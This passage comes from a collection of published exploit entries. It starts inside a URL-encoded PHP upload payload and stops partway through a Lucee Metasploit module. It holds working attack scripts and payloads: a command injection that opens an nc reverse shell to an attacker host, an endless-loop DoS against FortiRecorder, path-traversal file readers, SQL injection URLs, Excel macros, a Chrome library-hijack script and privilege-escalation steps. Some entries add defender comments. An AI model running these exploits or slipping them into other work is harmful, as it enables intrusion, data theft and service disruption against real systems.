ce6BJHhuVn%2BFVM%2BIq1m6fEjxGnoiqLXii7XM%2BRPJql2bwAYXsNpAI8VOrKcH2IIdmaOX0Q%2FB3mnOsX8uYQ2CDnB97h0Ejlsu1GFrgA4kjprshK07DFJqhk3ipa8yTlIge6W4jjJzFoMkGZ6bITEZgTmaYkacuiV4vA5jmbII0I36FSlllwrHFHoxfiBUOctnaPoQjsNw4G4bH%2FIKA4CGkwT3hYg6rStw5iWuIjbZSVyY8pKPC7D4ctEgeSm3EnNlcIG30K%2BoV8wg2PNcxBtBE9Vakloz3b2EEyCF5J2kohlZzDZpJj%2FB28f4nXzXrGHYSJ6XXm%2FbMMfUcBZzfcbHyNvNWxPRLKjH1GEGCoK1zpEHUaHpyVSoRNzw8B1JqA4jSOylwXEHImfww7qg1ZROmZumS39RsoDiJc8Nju8k%2FwATwjNokGJwppOkFLtdKafBnWxOW1sqFo0%2FjElkgDfmgHV7QSi6WOyNAbpuB9U%2BmTpoZYaoaegvpJ08U5wpaRJMmBMb%2BCS0sYxwg26dUbhsGcvdMCPNH1RyVmgwVQFnegE6DkJSXtTxQ0nNLLEub6C%2Fup4J7py72AJ6an5JZ2poZi0cgozybVF4Y9Mf9jcdnzTGbWOY5p1XhzszQPDY%2FZeacCxxpugzykajqtieKGmATDmO%2FrGx%2FwAgmjNNeWLKDTtDTG1csOjo5p2QwImYgHUIKvxHMIInkdiPFcqvygGfIqOSrKwToK4hw5tqtMnNFwN13
C401GQHd4DwnoUNS4uGyLR%2BaJdjy4VWvpWB1CRtJWOot6G2Fxb2kgG41a76FNsE51TaOiRYSi97w5y13CsNCRNzdI6dRV%2FQ2jShhleS9qaJbXNQXEmeo3C9gxr4YV55x%2FB5gTC1N%2BaRlUfabPOcRTg201HgqkTjaRa4hDKhB6NbwdkUpTKhUgX33S3g7D8FW1A5cyo5OJAGhJOiUcSwbnXi6JbV2BiEQ089Pn4o9Bww2LwbmnzUqNNzW2uNytXicCKh5jc%2FRUPwEDQxyCXyP6X0yzQ4u1IG%2FXoFpOGcShuUiwi8%2Bv50VQ4Xm0EHdWUsDl7safk%2BKnKTXSsEmOeFYhtR9RznABoEeElBV3tr1jl%2FSLDx5pXXpEERa8ny0C7wbE%2FALXu0c6I%2BqlakW8%2BdlFekKeIIOhhOMe2sGfyntcP6mkd4DmOaFx5biHlzdQdemyJp4R1rd4W%2Fdc3TBVoqw2LqNYJaHTrFh6bFcw9cum5N9Dt0T%2FAYMx3hr0R%2BC4VTzERce6RtvgycUIcPwn4rTcghOOE8NNgdk6p4UMcLI1lEA5hodQh%2FG30V5f0fYbAgBFUSGmykyoEO0HMrpKPDNbl0vxwlhKQYmkHNiFpK7RkISEFdkDjPOO0nDoJIWb%2BEvUeO4IOaVjP%2BndE0J6BkhbsM4Q4%2FCBRcZkPgYFNoHJdbWiVVk0QqHKbXRGGql5gk%2BH3XzL3t4KLxl0uV3A9CXUHD%2Bq2yvpVIF7nQKNCubDL5fcqz4ZJEmDrbZdZ1BdHDEeJ%2FCVVSpAuI%2FCpF%2BUanxOpVrW5QTPJTkUihdxjDMYDz2WS4hXtTZGhK2GOpBzc7jqQADzOgWX4zQBrBjb5bHxWZaZq6hr2cwsSTpBlPeH1W1HcxzHPaVLgNMCjmIuAZHh%2ByE7O04cS3TMbdJRbB2zUUgGiNRt0U8xnTz381RnJMGxGhUatYwDNzZH0T8hWcz3tET8WR4IDDvdbNed0Y4aQipCtHZMgjcI3DHUEXQtSsGiPwKbcQDeU619Eew1wOUrO1nQ4haGk%2ByQ8RZ%2FMQy8sOPtA%2BJbmakv8AAp9Ch8FSTKtGG4Y6WAK80Qd7oXhmiYYZb6tGO6ADTc11zZGYWo0mSVbi2iEmqmNEnCi2M8RijTPcV1HHgkE25%2Fug8Fc3V2LaINtkr0OthWJxIqOpie6XCY36JpiCBfzWX4UP5g8QtBjj3h%2Ft%2Bqm%2BD1TE%2FaCq92Qgw1rp89JVlPh2Qhx3E%2BpRPHgPhf8Ak36JjxQfyR5KL4WT4FYWGsyxflzlC8KDQSWm8mW76q2kf%2Fr%2FANo%2BaTOMYq1vBDWgJXZo3uLiYEGFPD0QBJMrlU2KroG351Rq3sHzQxztjNcRrK7U4nTy2MoSibFBUB3kVKhPF9GP8UXX12V2Ao%2F8LmEAlGkLl%2BW2c9aQWxtkh4i8iotC39Kz%2FFP1hPl%2F1FxdLmXC%2Bhdo6K2FNIZn%2F9k%3D&filename=hello.php #we visit the image http://localhost/uploads/users/tmp/hello.php
  7. # Exploit Title: Snitz Forum v1.0 - Blind SQL Injection # Date: 13/03/2023 # Exploit Author: Emiliano Febbi # Vendor Homepage: https://forum.snitz.com/ # Software Link: https://sourceforge.net/projects/sf2k/files/ # Version: ALL VERSION # Tested on: Windows 10 [code] ._ _______. */ ///______I ) . /_(_) /__/ *0day PoC* http://www.site.com/forum/cal.asp?date=25/03/2023 <= SQLi ??? http://www.site.com/forum/log.asp?log_id=3456 <= Blind SQLi #!WORK!# ._________. */ ///______I ) . /_(_) /__/*0day PoC End* [/code]
  8. # Exploit Title: Wondershare Dr Fone 12.9.6 - Privilege Escalation # Date: 14 March 2023 # Exploit Author: Thurein Soe # Vendor Homepage: https://drfone.wondershare.com # Software Link: https://mega.nz/file/ZFd1TZIR#e2WfCX_ryaH08C3VNGZH1yAIG6DU01p-M_rDooq529I # Version: Dr Fone version 12.9.6 # Tested on: Window 10 (10.0.19045.2604) # CVE : CVE-2023-27010 *Vulnerability description*: Wondershare Dr Fone version 12.9.6 installs a Windows service named "WsDrvInst" with weak service permissions, making it susceptible to a local privilege escalation vulnerability. The service runs as the SYSTEM user, so a standard user or domain user can elevate to administrator privileges by modifying the service or replacing the affected executable. DriverInstall.exe grants modification permission to any authenticated user of the Windows operating system, allowing standard users to modify the service and leading to privilege escalation. C:\Users\NyaMeeEain\Desktop>cacls "C:\Program Files (x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe" C:\Program Files (x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe Everyone:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R C:\Users\NyaMeeEain\Desktop>sc qc WsDrvInst SERVICE_NAME: WsDrvInst TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Driver Install Service DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem
# Exploit Title: Altenergy Power Control Software C1.2.5 - OS command injection
# Google Dork: intitle:"Altenergy Power Control Software"
# Date: 15/3/2023
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://apsystems.com/
# Version: C1.2.5
# Tested on: Windows 10
# CVE : CVE-2023-28343

import requests
import argparse


def exploit(target,attacker,port):
    """POST a crafted ``timezone`` value to the device's management endpoint.

    Args:
        target: base URL of the device (scheme + host); used verbatim in
            the request URL, ``Origin`` and ``Referer`` headers.
        attacker: host the device is told to connect back to.
        port: TCP port on that host.

    Returns:
        None.  The HTTP response is stored in ``response`` but never
        inspected (the print is commented out), so the caller gets no
        success/failure indication.

    Defender notes: the injection point is the ``timezone`` form field of
    ``/index.php/management/set_timezone``.  The value contains shell
    backticks, ``mknod``, ``/bin/sh`` and ``nc`` — none of which belong
    in a time-zone identifier — so a request filter on that field, or an
    egress rule on the device, catches this.  Server-side, the field
    should be validated against an allow-list of zone names instead of
    being passed to a shell.
    """
    url = f'{target}/index.php/management/set_timezone'
    headers = {
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin': f'{target}',
        'Referer': f'{target}/index.php/management/datetime',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,en;q=0.9',
        'Connection': 'close'
    }
    print(f"Sending Request")  # f-string without placeholders
    data = {
        'timezone': f'`mknod /tmp/pipe p;/bin/sh 0</tmp/pipe | nc {attacker} {port} 1>/tmp/pipe`'
    }
    response = requests.post(url, headers=headers, data=data)
    # print(response.text)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Parse target, attacker, and port.',)
    # None of the options is marked required, so a missing --target yields
    # the literal URL "None/index.php/..." rather than an argparse error.
    parser.add_argument('--target','-t', type=str, help='The target IP address or hostname. example : http://192.168.254')
    parser.add_argument('--attacker','-a', type=str, help='The attacker IP address or hostname.')
    parser.add_argument('--port', '-p',type=int, help='Listening port')
    args = parser.parse_args()
    try:
        exploit(args.target,args.attacker,args.port)
    except:
        # Bare except: every failure (connection error, bad URL, even
        # KeyboardInterrupt) is swallowed and only the help text is shown.
        parser.print_help()
    # Printed unconditionally, so it does not indicate success.
    print("Exploit done")
# Exploit Title: FortiRecorder 6.4.3 - Denial of Service
# Google Dork: N/A
# Date: 13/03/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/network-based-video-security/forticam-fortirecorder
# Version: 6.4.3 and below && 6.0.11 to 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-41333
# Security Advisory: https://www.fortiguard.com/psirt/FG-IR-22-388
# Technical Analysis: https://medium.com/@0xpolar/cve-2022-41333-71eb289d60b5

# Defender notes (from the requests built below):
# - Both senders loop forever against /module/admin.fe with a `fewReq`
#   parameter; the script ends only on Ctrl-C or an unhandled requests
#   exception.  The request rate to that path is the thing to alert on.
# - Every request carries the User-Agent "CVE-2022-41333", a trivial
#   log signature for this particular script.
# - TLS verification is disabled (verify=False) and the resulting warning
#   is filtered out below.
# - Mitigation is the fixed version in the advisory linked above.

import requests
import warnings
import sys
from urllib.parse import unquote

warnings.filterwarnings('ignore', message='Unverified HTTPS request')


def POST(target, req_type, payload):
    """Send the payload as a POST form body in an endless loop.

    Args:
        target: base URL (scheme + host), concatenated verbatim.
        req_type: unused inside this function.
        payload: URL-encoded value; it is ``unquote``d once and sent as
            ``fewReq=<decoded>``.

    Never returns normally: ``while True`` has no break.  Each response is
    only checked for the text "Failed: Access denied", which this script
    treats as "accepted"; anything else is printed in full.
    """
    print("[+] Target : "+target)
    print("[+] Request Type: POST")
    print("[+] Payload : " +payload)
    post_url = target+"/module/admin.fe"
    post_headers = {"User-Agent": "CVE-2022-41333", "Content-Type": "application/x-www-form-urlencoded"}
    url_decoder = unquote(payload)
    full_payload = "fewReq="+url_decoder
    while True:
        r = requests.post(post_url, headers=post_headers, data=full_payload, verify=False)
        if "Failed: Access denied" in r.text:
            print("[+] Payload Sent.")
        else:
            print("[!] Something went wrong!")
            print(r.text)


def GET(target, req_type, payload):
    """Send the payload as a GET query parameter in an endless loop.

    Same contract as ``POST`` except the payload is appended to the URL
    without decoding and the connection is closed per request
    (``Connection: close``).  ``req_type`` is unused.  Never returns
    normally.
    """
    print("[+] Target : "+target)
    print("[+] Request Type: GET")
    print("[+] Payload : " +payload)
    while True:
        url = target+"/module/admin.fe?fewReq="+payload
        headers = {"User-Agent": "CVE-2022-41333", "Connection": "close"}
        r = requests.get(url, headers=headers, verify=False)
        if "Failed: Access denied" in r.text:
            print("[+] Payload Sent.")
        else:
            print("[!] Something went wrong!")
            print(r.text)


# Script body: three positional arguments, no usage check — a missing
# argument raises IndexError.
print("[+] Starting ..")
target = str((sys.argv[1]))  # https://fortirecorder.fortidemo.com
req_type = str((sys.argv[2]))  # POST or GET
payload = str((sys.argv[3]))  # :B:JSsrJW16blB9dXp8ayJMZmxcfnJee3J2cTltem5efGt2cHEiLio5amx6bXF+cnoi
# "http" in target is a substring test, not a scheme check, so the guard
# only rejects strings that contain neither "http" nor "https" anywhere.
if "post" in req_type.lower():
    if "https" in target.lower() or "http" in target.lower():
        POST(target, req_type, payload)
    else:
        print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
elif "get" in req_type.lower():
    if "https" in target.lower() or "http" in target.lower():
        GET(target, req_type, payload)
    else:
        print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
else:
    print("[!] Invalid Request Type.")
  11. # Title: Adobe Connect 11.4.5 - Local File Disclosure # Author: h4shur # date:2021.01.16-2023.02.17 # CVE: CVE-2023-22232 # Vendor Homepage: https://www.adobe.com # Software Link: https://www.adobe.com/products/adobeconnect.html # Version: 11.4.5 and earlier, 12.1.5 and earlier # User interaction: None # Tested on: Windows 10 & Google Chrome, kali linux & firefox ### Summary: Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction. ### Description : There are many web applications in the world, each of which has vulnerabilities due to developer errors, and this is a problem for all of them, and even the best of them, like the "adobe connect" program, have vulnerabilities that occur every month. They are found and fixed by the team. * What is LFD bug? LFD bug stands for Local File Disclosure / Download, which generally allows the attacker to read and download files within the server, so it can be considered a very dangerous bug in the web world and programmers must be aware of it. Be careful and maintain security against this bug * Intruder access level with LFD bug The level of access using this bug can be even increased to the level of access to the website database in such a way that the hacker reads sensitive files inside the server that contain database entry information and enters the database and by extracting the information The admin will have a high level of access * Identify vulnerable sites To search for LFD bugs, you should check the site inputs. If there is no problem with receiving ./ characters, you can do the test to read the files inside the server if they are vulnerable. Enter it and see if it is read or not, or you can use files inside the server such as / etc / passwd / .. 
and step by step using ../ to return to the previous path to find the passwd file * And this time the "lfd" in "adobe connect" bug: To download and exploit files, you must type the file path in the "download-url" variable and the file name and extension in the "name" variable. You can download the file by writing the file path and file name and extension. When you have written the file path, file name and extension in the site address variables, a download page from Adobe Connect will open for you, with "Save to My Computer file name]" written in the download box and a file download link at the bottom of the download box, so you can download the file. * There are values inside the url that do not allow a file other than this file to be downloaded. * Values: sco_id and tickets But if these values are cleared, you will see that reloading is possible without any obstacles At another address, you can download multiple files as a zip file. We put the address of the files in front of the variable "ffn" and if we want to add the file, we add the variable "ffn" again and put the address of the file in front of it. The "download_type" variable is also used to specify the zip extension. ### POC : https://target.com/[folder]/download?download-url=[URL]&name=[file.type] https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[base file folder] ### References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232 https://nvd.nist.gov/vuln/detail/CVE-2023-22232 https://helpx.adobe.com/security/products/connect/apsb23-05.html
  12. ## Exploit Title: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE) ## Exploit Author: nu11secur1ty ## Date: 03.16.2023 ## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel ## Software: https://www.microsoft.com/en-us/microsoft-365/excel ## Reference: https://www.invicti.com/learn/remote-code-execution-rce/ ## CVE ID: CVE-2023-23399 ## Description: The malicious user can exploit the victim's PC remotely. For example, when the score indicates that the Attack Vector is Local and User Interaction is Required, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer. STATUS: HIGH Vulnerability [+]Exploit0: ``` Sub Check_your_salaries() CreateObject("Shell.Application").ShellExecute "microsoft-edge:https://attacker.com" End Sub ``` [+]Exploit1: ``` Sub cmd() Dim Program As String Dim TaskID As Double On Error Resume Next Program = "cmd.exe" TaskID = Shell(Program, 1) If Err <> 0 Then MsgBox "Can't start " & Program End If End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399) ## Proof and Exploit: [href](https://streamable.com/dnyfx0) ## Time spend: 03:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
#!/usr/bin/env python3
# Exploit Title: Icinga Web 2.10 - Arbitrary File Disclosure
# Date: 2023-03-19
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://icinga.com/
# Software Link: https://github.com/Icinga/icingaweb2
# Version: <2.8.6, <2.9.6, <2.10
# Tested on: Icinga Web 2 Version 2.9.2 on Linux
# CVE: CVE-2022-24716
# Based on: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/
#
# Defender note: the only request of interest below is a GET for
#   <TARGET>lib/icinga/icinga-php-thirdparty<FILE>
# where FILE is an absolute path (the help text uses /etc/passwd and
# /etc/icingaweb2/config.ini as examples) appended with no separator.
# Web-server access logs showing that route immediately followed by a
# second "/" are the observable trace; the fixed versions are listed
# in the Version line above.

import argparse
import requests
from termcolor import colored


def print_message(message: str, type: str) -> None:
    """Print `message` with a coloured, bracketed level tag.

    Recognised levels are SUCCESS, INFO, WARNING, ALERT and ERROR;
    any other value prints nothing (no else branch).
    """
    if type == 'SUCCESS':
        print('[' + colored('SUCCESS', 'green') + '] ' + message)
    elif type == 'INFO':
        print('[' + colored('INFO', 'blue') + '] ' + message)
    elif type == 'WARNING':
        print('[' + colored('WARNING', 'yellow') + '] ' + message)
    elif type == 'ALERT':
        print('[' + colored('ALERT', 'yellow') + '] ' + message)
    elif type == 'ERROR':
        print('[' + colored('ERROR', 'red') + '] ' + message)


def get_normalized_url(url: str) -> str:
    """Return `url` with a trailing slash and an http:// scheme if none was given.

    NOTE(review): an empty string raises IndexError on the `url[-1]` lookup;
    argparse does not prevent an empty TARGET/--proxy value.
    """
    if url[-1] != '/':
        url += '/'
    if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
        url = "http://" + url
    return url


def get_proxy_protocol(url: str) -> str:
    """Return 'https' when `url` starts with https:// (case-insensitive), else 'http'."""
    if url[0:8].lower() == 'https://':
        return 'https'
    return 'http'


parser = argparse.ArgumentParser(description='Arbitrary File Disclosure Vulnerability in Icinga Web <2.8.6, <2.9.6, <2.10')
parser.add_argument('TARGET', type=str, help='Target Icinga location (Example: http://localhost:8080/icinga2/ or https://victim.xyz/icinga/)')
parser.add_argument('FILE', type=str, help='Filename to gather from exploit (Example: "/etc/passwd" or "/etc/icingaweb2/config.ini")')
parser.add_argument('-P','--proxy', type=str, help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
args = parser.parse_args()

# The proxies dict is keyed by the proxy's own scheme, so only requests of
# that scheme are routed through it.
if args.proxy:
    proxy_url = get_normalized_url(args.proxy)
    proxy_protocol = get_proxy_protocol(proxy_url)
    proxies = { proxy_protocol: proxy_url }
else:
    proxies = {}

base_url = get_normalized_url(args.TARGET)
# FILE is concatenated directly after the static-asset route (no separator).
exploit_url = base_url + "lib/icinga/icinga-php-thirdparty" + args.FILE

# Reachability probe: only a 404 on the base URL is treated as failure.
# NOTE(review): connection errors raise out of requests.get() uncaught, and
# other non-2xx codes fall through to the second request.
request = requests.get(base_url, proxies=proxies)
if request.status_code == 404:
    print_message("Could not connect to provided URL!", "ERROR")
    exit()

# The response body is printed verbatim, whatever status code comes back.
request = requests.get(exploit_url, proxies=proxies)
file_content = request.text
print(file_content)
# Exploit Title: Restaurant Management System 1.0 - SQL Injection
# Date: 2023-03-20
# Exploit Author: calfcrusher ([email protected])
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html
# Version: 1.0
# Tested on: Apache 2.4.6, PHP 5.4.16

Endpoint: /rms/delete-order.php
Vulnerable parameter: id (GET)

Time-based SQL injection payloads:

http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23
http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)--
#Exploit Title: Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu)
Product: Google Chrome
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 109.0.5414.74
#Impact: Moderate
#Company: Cyber Citadel
#Website: https://www.cybercitadel.com
#Tested-on : Ubuntu 22.04.1

*Description*

Google Chrome attempts to load the 'libnssckbi.so' file from a user-writable location.

PATH: /home/$username/.pki/nssdb/libnssckbi.so

Since the path from which the shared library 'libnssckbi.so' is loaded is writable, it is possible to achieve code execution by placing a malicious file with the name `libnssckbi.so` in that path.

*exploit*

Following is the POC that could be used to reproduce the issue:

echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."
echo "[*] Checking /.pki/nssdb PATH"
if [ -d "/home/haalim/.pki/nssdb" ]
then
echo "[+] Directory Exists..."
if [ -w "/home/haalim/.pki/nssdb" ]
then
echo "[+] Directory is writable..."
echo "[+] Directory is writable..."
echo "[+] Generating malicious File libnssckbi.so ..."
echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c
echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c
echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c
echo "}" >> /home/haalim/.pki/nssdb/exploit.c
gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o
gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o
fi
fi

Upon closing the browser window, the application executes the malicious code.

*Impact*

The attacker can use this behavior to bypass application whitelisting rules. This behavior can also lead to DoS attacks.
An attacker can trick a victim into supplying credentials by creating a fake prompt.
# Exploit Title: ActFax 10.10 - Unquoted Path Services
# Date: 22/03/2023
# Exploit Author: Birkan ALHAN (@taftss)
# Vendor Homepage: https://www.actfax.com
# Software Link: https://www.actfax.com/en/download.html
# Version: Version 10.10, Build 0551 (2023-02-01)
# Tested on: Windows 10 21H2 OS Build 19044.2728

#Discovering the unquoted service path:

C:\Users\taftss>sc qc ActiveFaxServiceNT
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ActiveFaxServiceNT
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ActiveFax-Server-Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:\Users\taftss>systeminfo

Host Name: RedsTaftss
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19044 N/A Build 19044

#Another method to discover unquoted service paths:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

#Exploit:

If the attacker has compromised the system and the compromised user has write privileges to the "C:\Program Files\ActiveFax" folder or "C:\", they can place their own malicious "ActSrvNT.exe" file there. The ActiveFaxServiceNT service can then be restarted to escalate privileges.

--
*Birkan ALHAN*
# Exploit Title: Lucee Scheduled Job v1.0 - Command Execution
# Date: 3-23-2012
# Exploit Author: Alexander Philiotis
# Vendor Homepage: https://www.lucee.org/
# Software Link: https://download.lucee.org/
# Version: All versions with scheduled jobs enabled
# Tested on: Linux - Debian, Lubuntu & Windows 10
# Ref : https://www.synercomm.com/blog/scheduled-tasks-with-lucee-abusing-built-in-functionality-for-command-execution/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
#
# Defender note: every step this module takes is an authenticated POST to the
# admin interface (TARGETURI, default /lucee/admin/web.cfm) with the query
# string action=services.schedule, carrying in sequence action2=create,
# action2=edit, mainAction=execute and finally mainAction=delete, followed by
# a GET for a randomly named <name>.cfm at the webroot. Those requests in
# access logs, plus the log files and on-disk .cfm artefact named under
# SideEffects below, are the observable trace. Not exposing the admin
# interface and setting a strong admin password are the controls the
# Description itself implies.

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Retry
  include Msf::Exploit::FileDropper

  require 'base64'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Lucee Authenticated Scheduled Job Code Execution',
        'Description' => %q{
          This module can be used to execute a payload on Lucee servers that
          have an exposed administrative web interface. It's possible for an
          administrator to create a scheduled job that queries a remote
          ColdFusion file, which is then downloaded and executed when accessed.
          The payload is uploaded as a cfm file when queried by the target server.
          When executed, the payload will run as the user specified during the
          Lucee installation. On Windows, this is a service account; on Linux,
          it is either the root user or lucee.
        },
        'Targets' => [
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Type' => :windows_cmd
            }
          ],
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd
            }
          ]
        ],
        'Author' => 'Alexander Philiotis', # [email protected]
        'License' => MSF_LICENSE,
        'References' => [
          # This abuses the functionality inherent to the Lucee platform and
          # thus is not related to any CVEs.
          # Lucee Docs
          ['URL', 'https://docs.lucee.org/'],
          # cfexecute & cfscript documentation
          ['URL', 'https://docs.lucee.org/reference/tags/execute.html'],
          ['URL', 'https://docs.lucee.org/reference/tags/script.html'],
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [
            # /opt/lucee/server/lucee-server/context/logs/application.log
            # /opt/lucee/web/logs/exception.log
            IOC_IN_LOGS,
            ARTIFACTS_ON_DISK,
            # ColdFusion files located at the webroot of the Lucee server
            # C:/lucee/tomcat/webapps/ROOT/ by default on Windows
            # /opt/lucee/tomcat/webapps/ROOT/ by default on Linux
          ]
        },
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'DisclosureDate' => '2023-02-10'
      )
    )

    # PASSWORD is optional (required flag false): when unset, datastore['PASSWORD']
    # is nil and that is what authenticate submits as login_passwordweb.
    register_options(
      [
        Opt::RPORT(8888),
        OptString.new('PASSWORD', [false, 'The password for the administrative interface']),
        OptString.new('TARGETURI', [true, 'The path to the admin interface.', '/lucee/admin/web.cfm']),
        OptInt.new('PAYLOAD_DEPLOY_TIMEOUT', [false, 'Time in seconds to wait for access to the payload', 20]),
      ]
    )
    deregister_options('URIPATH')
  end

  # Orchestrates the whole flow: authenticate, serve the .cfm stub from the
  # module's own HTTP server under a random 8-16 character name, create and
  # update the scheduled job pointing at it, execute it, then delete the job.
  def exploit
    payload_base = rand_text_alphanumeric(8..16)
    authenticate
    # The served path is '/<payload_base>.cfm'; the same name is reused for
    # the job and for the file written at the target's webroot.
    start_service({
      'Uri' => {
        'Proc' => proc do |cli, req|
          print_status("Payload request received for #{req.uri} from #{cli.peerhost}")
          send_response(cli, cfm_stub)
        end,
        'Path' => '/' + payload_base + '.cfm'
      }
    })
    #
    # Create the scheduled job
    #
    create_job(payload_base)
    #
    # Execute the scheduled job and attempt to send a GET request to it.
    #
    execute_job(payload_base)
    print_good('Exploit completed.')
    #
    # Removes the scheduled job
    #
    # Cleanup is best-effort: a non-302 reply is only reported, not fatal.
    print_status('Removing scheduled job ' + payload_base)
    cleanup_request = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'vars_get' => {
        'action' => 'services.schedule'
      },
      'vars_post' => {
        'row_1' => '1',
        'name_1' => payload_base.to_s,
        'mainAction' => 'delete'
      }
    })
    if cleanup_request && cleanup_request.code == 302
      print_good('Scheduled job removed.')
    else
      print_bad('Failed to remove scheduled job.')
    end
  end

  # Logs in to the web admin with datastore['PASSWORD'] and keeps the session
  # cookie for later requests. Success is judged by a 200 whose body contains
  # 'nav_Security'; anything else aborts the module.
  def authenticate
    auth = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'keep_cookies' => true,
      'vars_post' => {
        'login_passwordweb' => datastore['PASSWORD'],
        'lang' => 'en',
        'rememberMe' => 's',
        'submit' => 'submit'
      }
    })
    unless auth
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
    unless auth.code == 200 && auth.body.include?('nav_Security')
      fail_with(Failure::NoAccess, 'Unable to authenticate. Please double check your credentials and try again.')
    end
    print_good('Authenticated successfully')
  end

  # Creates a scheduled job named payload_base whose URL is this module's
  # server, then edits it so its output is published to a file at the
  # target's webroot. The job id comes from the Location header of the create
  # response (last '=' separated field).
  def create_job(payload_base)
    create_job = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'keep_cookies' => true,
      'vars_get' => {
        'action' => 'services.schedule',
        'action2' => 'create'
      },
      'vars_post' => {
        'name' => payload_base,
        'url' => get_uri.to_s,
        'interval' => '3600',
        'start_day' => '01',
        'start_month' => '02',
        'start_year' => '2023',
        'start_hour' => '00',
        'start_minute' => '00',
        'start_second' => '00',
        'run' => 'create'
      }
    })
    fail_with(Failure::Unreachable, 'Could not connect to the web service') if create_job.nil?
    fail_with(Failure::UnexpectedReply, 'Unable to create job') unless create_job.code == 302
    print_good('Job ' + payload_base + ' created successfully')
    job_file_path = file_path = webroot
    fail_with(Failure::UnexpectedReply, 'Could not identify the web root') if job_file_path.blank?
